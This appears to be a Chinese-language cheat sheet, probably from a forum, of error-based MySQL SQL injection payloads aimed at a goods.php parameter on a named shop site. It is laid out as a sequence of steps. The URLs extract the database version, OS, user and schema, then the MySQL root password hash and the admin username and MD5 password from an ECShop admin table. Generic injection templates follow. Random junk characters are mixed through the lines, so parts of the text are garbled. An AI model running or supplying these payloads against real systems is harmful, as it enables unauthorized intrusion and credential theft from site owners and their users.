判断版本号
- @4 `' R; J1 Q& E0 Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 m: F. N. r% ^# p; A
6 K' m. H4 k- B# v0 t* V) d) D- S判断系统
( l% |% \! o- w3 [) O
- t- |0 p4 z9 K0 R3 g8 Jhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 ?3 K8 G5 F0 C P0 b
+ A% Z# y8 v$ e0 y/ l
: y. D7 p7 m6 A" G$ d9 t$ f7 a3 t/ W1 F4 E* A
当前 user()% m# A. }9 P G% s" K5 @; m8 B" Z
8 ]5 _1 s- P l: `- M5 s
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 u7 f( ?4 ~: H6 j! C
/ t9 S# I# v$ M' T) {
2 L4 J$ H% u+ v7 k. S+ R5 x+ s8 a1 g9 z- E! |
当前 database() h3 o9 U( w- h' [1 m. O( o# B
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
p |* p; Z4 G- H; ~4 a
# p) p- l- N, d6 u
/ B8 {4 ^9 X! z0 e5 J* w6 ` C" P* w4 n, Q, ^4 E) }: a
: R- w" f1 X2 Z; ]9 droot hash9 _$ B7 m4 M5 z; f
+ \: ^8 q* Q; Shttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( U o; y! y- D1 }& z5 l x; b4 I$ Q4 k U# r, V |
* V$ V( _0 t" a) D3 [
+ r+ _! V7 K% r+ Y0 ^
当前 数据库表名
0 a) R2 m+ z' H v l$ f3 C
+ R; u0 n, J% |' bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 L E- X/ e: |' a, P8 W
6 h6 z/ _0 c7 Q; O7 h, V
# P( P& B1 o# C* V
8 p* A* _# Z2 G9 j6 o* k, ~% X% `4 V当前 数据库 user_name 字段( W6 ?- c! B8 `- B8 G
' e" y: C8 Z! F. Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
3 A @% q- H4 n; i9 Y; w% Q, `
. Y* m8 ?. R# u" E' Y当前 数据库 字段 password2 J! J3 Z2 F9 _: u# F( n
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; a9 X0 ?- O. Y) S5 X& j
+ k' n: J* I4 C( i5 ?; t+ g. L; r
6 m6 L; V# @4 j+ c# t C4 V3 B ^. S) t+ ?4 J! u
获得 admin passwd(md5)
4 R2 t! S7 T( Z( m
5 U1 l% s7 M* [& I b. |" X- B& y- v$ m: t' U2 {
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 \9 ^* V4 E, t, O5 | N
9 C1 }! f# z9 V5 n2 _
报错注射$ ^4 \0 W5 s5 F5 H& V9 }) q" I# X7 B
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)' \) n8 U* _1 R+ ]. D7 Y' }+ y
( O4 g! d& V( \! Z( q6 xSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
# ]* W9 y) Z7 Y5 g& U# Y! T# z& [* N4 G
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |